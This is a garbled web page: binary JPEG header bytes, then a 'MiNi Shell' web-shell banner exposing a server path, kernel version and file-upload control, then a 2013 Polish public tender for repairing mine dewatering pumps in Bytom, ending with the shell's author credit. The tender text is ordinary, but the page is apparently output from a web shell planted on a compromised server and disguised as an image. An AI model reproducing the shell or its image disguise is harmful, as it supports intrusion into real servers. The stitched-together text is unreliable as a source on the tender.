JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131024/222965-N-2013.html

<p class="kh_header"><b>Bytom: Część I	-	Wykonanie remontów pomp głównego  odwadniania oraz pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Siemianowice. 
i/lub
Część II	- 	Wykonanie remontu  pomp głównego odwadniania- dla Ruchu II Pompownie Stacjonarne pompownia Pstrowski- pompy stacjonarne. 
i/lub
Część III	- 	Remont pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Szombierki. 
i/lub
Część IV	- 	Remonty pomp głównego odwadniania - dla Ruchu II Pompownie Stacjonarne pompownia Powstańców Śląskich Bytom I.</b><br>
<b>Numer ogłoszenia: 222965 - 2013; data zamieszczenia: 24.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I	-	Wykonanie remontów pomp głównego  odwadniania oraz pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Siemianowice. 
i/lub
Część II	- 	Wykonanie remontu  pomp głównego odwadniania- dla Ruchu II Pompownie Stacjonarne pompownia Pstrowski- pompy stacjonarne. 
i/lub
Część III	- 	Remont pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Szombierki. 
i/lub
Część IV	- 	Remonty pomp głównego odwadniania - dla Ruchu II Pompownie Stacjonarne pompownia Powstańców Śląskich Bytom I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I	-	Wykonanie remontów pomp głównego  odwadniania oraz pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Siemianowice. 
i/lub
Część II	- 	Wykonanie remontu  pomp głównego odwadniania - dla Ruchu II Pompownie Stacjonarne pompownia Pstrowski- pompy stacjonarne. 
i/lub
Część III	- 	Remont pomp odwadniających - dla Ruchu II Pompownie Stacjonarne pompownia Szombierki. 
i/lub
Część IV	- 	Remonty pomp głównego odwadniania - dla Ruchu II Pompownie Stacjonarne pompownia Powstańców Śląskich Bytom I..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 
 Część I : 	13 400,00 zł  (trzynaście tysięcy czterysta złotych 00/100) 
 	Część II : 	  7 200,00 zł  (siedem tysięcy dwieście złotych 00/100) 
	Część III :	     700,00 zł  (siedemset  złotych  00/100) 
 	Część IV:	     700,00 zł  (siedemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą                         o charakterze i złożoności porównywalnej z przedmiotem zamówienia polegającej na:
Część I, II remoncie pomp głównego odwadniania oraz pomp odwadniających, 
Część III, IV remoncie pomp odwadniających,
 
o wartości minimum tj. 
Część I: 		  260 000,00 zł brutto, 
Część I:                     14 000,00 zł brutto 	
Część II: 		     80 000,00 zł brutto, 	
Część II: 		     60 000,00 zł brutto, 		
Część III: 		     14 000,00 zł brutto, 	
Część IV: 		     14 000,00 zł brutto, 		
	
wraz z dowodami realizacji wszystkich usług ujętych w wykazie oraz jeżeli pozytywnie zweryfikowana zostanie przez Zamawiającego zdolność Wykonawcy do należytego wykonania zamówienia zgodnie z postanowieniami pkt. 5.3.2. SIWZ.

            W przypadku składania oferty na większą ilość części można także wykazać się jedną usługą stanowiącą sumę wartości, o których mowa powyżej. 

5.3.2.	Zamawiający na podstawie art. 22 ust. 5 ustawy Prawo zamówień publicznych zweryfikuje zdolność Wykonawcy do należytego wykonania zamówienia 
w szczególności w odniesieniu do jego rzetelności, kwalifikacji, efektywności 
i doświadczenia, z zastrzeżeniem postanowień pkt. 6A ppkt 3 SIWZ. 
W przypadku wykazania przez Wykonawcę w pkt. III tabeli w załączniku nr 4 do druku Oferta informacji o choć jednej usłudze niewykonanej lub wykonanej nienależycie z przyczyn leżących po stronie Wykonawcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy 
w tym okresie, a także w przypadku pozyskania przez Zamawiającego 
w jakikolwiek inny sposób informacji (potwierdzonej przez odbiorcę usługi) o choć jednej usłudze niewykonanej lub wykonanej nienależycie z przyczyn leżących po stronie Wykonawcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, Zamawiający uzna, że Wykonawca nie wykazał się rzetelnością w wykonywaniu usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a tym samym, że Wykonawca nie spełnia warunku wiedzy i doświadczenia i wykluczy go z postępowania na podstawie art. 24 ust. 2 pkt 4 z uwagi, iż Wykonawca nie wykazał spełnienia warunku udziału 
w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą                         o charakterze i złożoności porównywalnej z przedmiotem zamówienia polegającej na:
Część I, II remoncie pomp głównego odwadniania oraz pomp odwadniających, 
Część III, IV remoncie pomp odwadniających,
 
o wartości minimum tj. 
Część I: 		  260 000,00 zł brutto, 
Część I:                     14 000,00 zł brutto 	
Część II: 		     80 000,00 zł brutto, 	
Część II: 		     60 000,00 zł brutto, 		
Część III: 		     14 000,00 zł brutto, 	
Część IV: 		     14 000,00 zł brutto, 		
	
            wraz z dowodami realizacji wszystkich usług ujętych w wykazie oraz jeżeli pozytywnie zweryfikowana zostanie przez Zamawiającego zdolność Wykonawcy do należytego wykonania zamówienia zgodnie z postanowieniami pkt. 5.3.2. SIWZ.

            W przypadku składania oferty na większą ilość części można także wykazać się jedną usługą stanowiącą sumę wartości, o których mowa powyżej.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.          
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału                            w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA 
2. Wypełnione formularze cenowe zawierające cenę za wykonanie remontu  poszczególnych    
             pomp oraz za poszczególne Części od I do IV zamówienia - załączniki nr 7.1 do    
            7.4, 8 do druku OFERTA.
3.     Wykonawca w druku OFERTA - załącznik nr 1 do druku SIWZ zobowiązany jest     
            złożyć zobowiązanie z tytułu gwarancji zgodnie z pkt. II ppkt.1. Załącznika Nr 2 do    
            SIWZ.
4.      Informacje o posiadanym stanowisku umożliwiającym wykonanie prób (testów) pomp    
            po przeprowadzonym remoncie lub możliwości przeprowadzenia takich prób w innym     
            zakładzie, zgodnie z pkt. II ppkt.2. Załącznika Nr 2 do SIWZ - załącznik nr 9 do   
            druku OFERTA.
5.    Oświadczenie producenta danego typoszeregu pomp - załącznik nr 10 do druku    
           OFERTA lub opinia lub certyfikat jednostki upoważnionej do przeprowadzania badań    
           wyrobów, zgodnie z pkt. II ppkt.3. Załącznika Nr 2 do SIWZ - kopię opinii lub    
           certyfikatu dołączyć do druku OFERTA.
6.      W przypadku, gdy Wykonawca prowadzi działalność w imieniu i na rzecz producenta    
           pomp w zakresie pozyskiwania zamówień na wykonywanie remontów pomp,    
           powinien on przedstawić upoważnienie producenta pomp do pozyskiwania    
           zamówień na remonty pomp oraz świadectwo autoryzacji lub certyfikat producenta    
           pomp zgodnie z pkt. II ppkt.4. Załącznika Nr 2 do SIWZ, dołączyć do druku   
           OFERTA</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom 30,00+VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem) w przypadku pobrania SIWZ ze strony internetowej-bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 11:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 -
sekretariat Spółki (II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I	-Wykonanie remontów pompy głównego  odwadniania oraz pompy odwadniającej - dla Ruchu II Pompownie Stacjonarne pompownia Siemianowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy usług będących przedmiotem zamówienia obejmuje wykonanie   
     remontów niżej wymienionych typów pomp
Część I - Ruch II, pompownia Siemianowice
OWH-200/9 
(główne odwadnianie)	1	wersja wykonania:
brąz
PSz 125	1	wersja wykonania:
standard
2.1. Zakres remontu:
2.1.1.Czynności wstępne:

demontaż pompy,
czyszczenie elementów pompy,
weryfikacja części przy współudziale Zamawiającego, potwierdzona protokołem rzeczowej kwalifikacji stanu technicznego poszczególnych elementów pompy,

2.1.2.Remont zasadniczy:

Dla pomp typu  OWH:
Remont w zakresie podstawowym:
wymiana wału, wirników, kierownic odśrodkowych, kierownic doprowadzających, tarczy odciążającej,
ścianek: ssawnej i tłocznej,
pierścieni: oporowych, ślizgowych, uszczelniających, dystansowych,
tulei: ochronnych wału, uszczelniających, dławikowych, dławnicy ssawnej, dławnicy tłocznej, kadłuba tłocznego, nakrętek wału, zamków hydraulicznych, dławików,
panewek,
regeneracja: kadłuba ssawnego, tłocznego, kadłubów stopniowych, kadłuba odciążającego i kadłubów łożyskowych,
wymiana pozostałych materiałów pomocniczych (uszczelki, szczeliwo, typowe elementy złączne, itp.) niezbędnych do przeprowadzenia remontu.  

Dla pompy typu PSz:
Remont w zakresie podstawowym:
wymiana uszczelnień czołowych, pokrywy ssawnej, wirnika, nakrętki wirnika,
remont kapitalny silnika (z wymianą uzwojeń),
regeneracja pozostałych elementów pompy,
pomiary ognioszczelności, pomiary elektryczne,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II	- Wykonanie remontów  pompy głównego odwadniania, oraz pompy odwadniającej - dla Ruchu II Pompownie Stacjonarne pompownia Pstrowski- pompy stacjonarne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Ruch II, pompownia Pstrowski
OW300AM/5	1	wersja wykonania:
standard
OS200B/3	2	wersja wykonania:
brąz
2.1. Zakres remontu:
2.1.1.Czynności wstępne:

demontaż pompy,
czyszczenie elementów pompy,
weryfikacja części przy współudziale Zamawiającego, potwierdzona protokołem rzeczowej kwalifikacji stanu technicznego poszczególnych elementów pompy,

2.1.2.Remont zasadniczy:

Dla pomp typu OS, OW:
Remont w zakresie podstawowym:
wymiana wału, wirników, kierownic odśrodkowych, kierownic doprowadzających, tarczy odciążającej,
ścianek: ssawnej i tłocznej,
pierścieni: oporowych, ślizgowych, uszczelniających, dystansowych,
tulei: ochronnych wału, uszczelniających, dławikowych, dławnicy ssawnej, dławnicy tłocznej, kadłuba tłocznego, nakrętek wału, zamków hydraulicznych, dławików,
panewek,
regeneracja: kadłuba ssawnego, tłocznego, kadłubów stopniowych, kadłuba odciążającego i kadłubów łożyskowych,
wymiana pozostałych materiałów pomocniczych (uszczelki, szczeliwo, typowe elementy złączne, itp.) niezbędnych do przeprowadzenia remontu.  

Dla pompy typu PSz:
Remont w zakresie podstawowym:
wymiana uszczelnień czołowych, pokrywy ssawnej, wirnika, nakrętki wirnika,
remont kapitalny silnika (z wymianą uzwojeń),
regeneracja pozostałych elementów pompy,
pomiary ognioszczelności, pomiary elektryczne,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III	- Remont pompy odwadniającej - dla Ruchu II Pompownie Stacjonarne pompownia Szombierki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Ruch II, pompownia Szombierki
1	PSz 125	1	wersja wykonania:
standard


2.1. Zakres remontu:
2.1.1.Czynności wstępne:

demontaż pompy,
czyszczenie elementów pompy,
weryfikacja części przy współudziale Zamawiającego, potwierdzona protokołem rzeczowej kwalifikacji stanu technicznego poszczególnych elementów pompy,

2.1.2.Remont zasadniczy:

Dla pomp typu OS, OW, OWH:
Remont w zakresie podstawowym:
wymiana wału, wirników, kierownic odśrodkowych, kierownic doprowadzających, tarczy odciążającej,
ścianek: ssawnej i tłocznej,
pierścieni: oporowych, ślizgowych, uszczelniających, dystansowych,
tulei: ochronnych wału, uszczelniających, dławikowych, dławnicy ssawnej, dławnicy tłocznej, kadłuba tłocznego, nakrętek wału, zamków hydraulicznych, dławików,
panewek,
regeneracja: kadłuba ssawnego, tłocznego, kadłubów stopniowych, kadłuba odciążającego i kadłubów łożyskowych,
wymiana pozostałych materiałów pomocniczych (uszczelki, szczeliwo, typowe elementy złączne, itp.) niezbędnych do przeprowadzenia remontu.  

Dla pompy typu PSz:
Remont w zakresie podstawowym:
wymiana uszczelnień czołowych, pokrywy ssawnej, wirnika, nakrętki wirnika,
remont kapitalny silnika (z wymianą uzwojeń),
regeneracja pozostałych elementów pompy,
pomiary ognioszczelności, pomiary elektryczne,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV	- Remont pompy odwadniającej - dla Ruchu II Pompownie Stacjonarne pompownia Powstańców Śląskich Bytom I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - Ruch II, pompownia Powstańców Śląskich BytomI
1	PSz 125	1	wersja wykonania:
standard
2.1. Zakres remontu:
2.1.1.Czynności wstępne:

demontaż pompy,
czyszczenie elementów pompy,
weryfikacja części przy współudziale Zamawiającego, potwierdzona protokołem rzeczowej kwalifikacji stanu technicznego poszczególnych elementów pompy,

2.1.2.Remont zasadniczy
Dla pompy typu PSz:
Remont w zakresie podstawowym:
wymiana uszczelnień czołowych, pokrywy ssawnej, wirnika, nakrętki wirnika,
remont kapitalny silnika (z wymianą uzwojeń),
regeneracja pozostałych elementów pompy,
pomiary ognioszczelności, pomiary elektryczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com